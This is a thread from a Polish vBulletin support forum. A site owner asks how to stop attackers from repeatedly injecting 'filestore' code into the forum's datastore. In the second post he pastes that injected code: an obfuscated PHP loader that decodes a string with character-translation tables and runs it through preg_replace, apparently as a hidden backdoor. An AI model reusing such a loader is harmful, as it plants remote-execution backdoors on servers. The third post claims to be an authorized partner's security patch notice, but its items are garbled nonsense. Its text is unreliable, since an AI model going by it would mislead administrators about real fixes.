• Rejestracja
vBHELP.pl - polskie wsparcie vBulletin
  1. #1
    bruny jest nieaktywny Użytkownik
    Dołączył
    Jul 2010
    Posty
    22

    Domyślnie filestore i dodatkowy problem

    Witam,
    jakis rok temu mialem ataki na forum z uwagi na włączone register globals,
    w koncu sie z tym uporalem (tak myslalem) az tu nagle w niedziele znowu to samo mimo ze reg off,
    powoli trace siły i niedobrze mi sie robi na mysl o tym calym vb i vbseo, na phpbb mialem mniej problemów,
    dodatkowo teraz widze cos jeszcze nie tak z linkami, tzn niby vbseo dziala, jednak na forum wszystko jest w wersji
    /showthread.php?t=24692 i dopiero po kliknieciu przekierowanie na przyjazny link - ma ktos pomysl jak to zmienic? :/
    no i jak skutecznie pozbyć sie tego przekierowania filestore, bo jak na razie to tylko loguje sie co kilka godzin wprawdzajac vb_datastore czy znow nie dopisało mi tego śmiecia :/ rece juz mi opadaja i ciarki na plecach przechodza :/

    pozdrawiam i dziekuje za pomoc[COLOR="Silver"]

    [SIZE=1]---------- Wiadomość dopisana o 17:28 ----------[/SIZE]

    [/COLOR]ok, z linkami juz sobie poradzilem, zresetowalem datastore przez check_pluginlist.php i ruszylo
    zostalo tylko to zabezpieczenie forum przez tym szajsem "filestore" :/



  2. #2
    bruny jest nieaktywny Użytkownik
    Dołączył
    Jul 2010
    Posty
    22

    Domyślnie

    $o = 'b74c41f67a29845aa411a8091b327899';
    $vbg = 'U`XtJ*~XzUc;GPUZuPUJkFMak<t-XBaT&/qY}<t?V"&C~?sgX|a-/<B;X/sgZQKRZ.RnUQ{SVHPRX/sd~"[@/<BQZ?aQZQZzDHR!kFMuk<S`&CatZYk`ZYDY#Ohn}ACn&elnZAstPHKR/Cf^>C{~k"aPV.ttP?[zV"klZ<><s[aR&|s`&">uZA{Q/Ak`POMTVH{j>Ma,B[zR~CgnV.R!kF>aqFfQ&|Pj~|[g+<KukQse~A{rZAfn&"BQj"sQ+/PzjFszP/kdjFtl~?{tUHsnkQdR/Cs[>t&[>tzY.[{>>[aB>gB./g[F{>@>kCgn}Q{T^>fd+/kT&BaCZ?duk[a,{Bk|{Bk~kgl>B[fj>RB"{Bk[>ePPV,zRPOChkFs~k<l`ZAqY/,zRZ7ChZFkt&Cao+/{7XHKYv<SnP?BZ#?s`~/SY~<aY~"BZ#YS@+|l`~Cd-j"kn~?Z-+<aojFtl~?{tU[d-ZYBrZ?[o+?StZtd-ZYBr+?[n&FBZ#esnkQdRPHR!k"KaqH{j>gB.BRB.|QPvB[{q/gl^>CqY/,zRZOChqga^.gt[/Cf.{>&k|OzR+,ChBMlk>Ca,qCkk>[qa^,gY~|tT+QZ!k"DakFh-k<SlZA{<X/snPHZ!k";akFh-k<Sl~?PjX|qY}Q{@^>f`Z?qu{RtD{Ba|{Bk,.>a}V,;CD,zRU7Ct~/fgU.KR/Cs[>t&[>tzY.[{>>[a+/gC^|ePPV,zRX7gY^Fs7Z?tdPHfgU/ft^.kg&/lg#<nlP?[T+AknZFqevFsQ+TgekQ;RP?kC~"StP"t-#,@`ZF{n~<@T|QPe+YBQ~HPP#eZ`~|tT+Q@dXFh6Zl%J;!(6P7gY#e{<+YBz~"BgX|;o^?adP"t`~Ys~kAsn~/fz&/&tZYsn~<;Y/.;Yk?[oZOoY^|nTv7;r#As7Z?tdPO;Y}<t?V"BoZF{@VH{jqga^.gt[|Q{-/.RnU<t?VH{lke&nZAstPHKR/gP[B[zYPePPV.+?V"tTZ<BgVH{j{gB>|QPYkCgnV.+?VH[t~/fgU.KR/gs^,gok{BzR+CgnV.t!X|+ukFqa^.{uV/on&eKRUetT&/{7~<a%X|>uk";zk<B-kQSgX|CtVHR%DT+dDOhn}Q{o^/sC+YsgZelo&O>uk"Kn#Ohz}HR!ZFkn~Yquv?{`+ABo&|@g#?S`+<[gX|a-^.PuPF{d}er`~/t?X|StZA{`Z?>-+<ao#<{`P<@z~<[R#YfuZOan&OC!k"CakQvn}ACtU"tg}ACn&eKuv.{CV.+?kFvnU<t?VH{@V/zR{gS^qR[D>CzYP"BoZ"SlP"BjX"a`XQPP|QPu&|[RX|@7~FBR&Ba2+/&lZ<sQX/fgkCg-^.{2}ACt~FstUQ{F,MaHq>S,|QPTPFtz&.PP|QP7ZADY/.;ak"u!j/Ca((1';
    $xml = '$z#rB&_K=ZN;Es4tA6xgw/dof05eU~`:[k3{^ycF}<JbqGM7V!1au,l*.+H8@%j(>C9YT)PR?"X-pQni]LDmO|W2vISh';
    $xml2 = '&sL8VZ`g[c+4]N~l3.:0}XwtB>=iebv/FJ*RP,6HO2(?Q_EjK7;9oTh@SYC!5rf)U1{nz#dkmGau^yp$<|M%DW-qI"xA';
    $as = '#c#'.substr($vbg, 365, 1);
    $vbt = preg_replace($as, strtr($vbg, $xml, $xml2), 'css');[COLOR="Silver"]

    [SIZE=1]---------- Wiadomość dopisana o 14:43 ----------[/SIZE]

    [/COLOR]czy jest tu ktos kto wie jak zabezpieczyc forum przed tym kurestwem w datastore?
    i ile by chcial za takie zlecenie zabezpieczenia forum przed tym raz na zawsze?


  3. #3
    pixelek jest nieaktywny Użytkownik
    Dołączył
    Aug 2013
    Posty
    39
    Przydatne posty
    3

    Domyślnie

    witam,

    dnia 14.08.2013 do naszej głównej dystrybucji VB wprowadziliśmy poprawki zabezpieczeń HTDS. Oto one:

    - plik post.php zabezpieczony markowaniem wstecznym ***a.P (wp-data.err)
    - plik mods-generate.isapi od teraz a niezmienne chmod 110.A!!!!!!!!!!!!!!!!!!!!
    - dodaliśmy obowiązkową captchę natywną.
    - odseparowaliśmy tabelę postów od tabeli użytkowników.

    Na wszystkich pinach została uruchomiona automatyczna aktualizacja skryptu.

    Pozdrawiam,
    CROMSoft.
    Autoryzowany partner Jelsoft


Chmurka.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67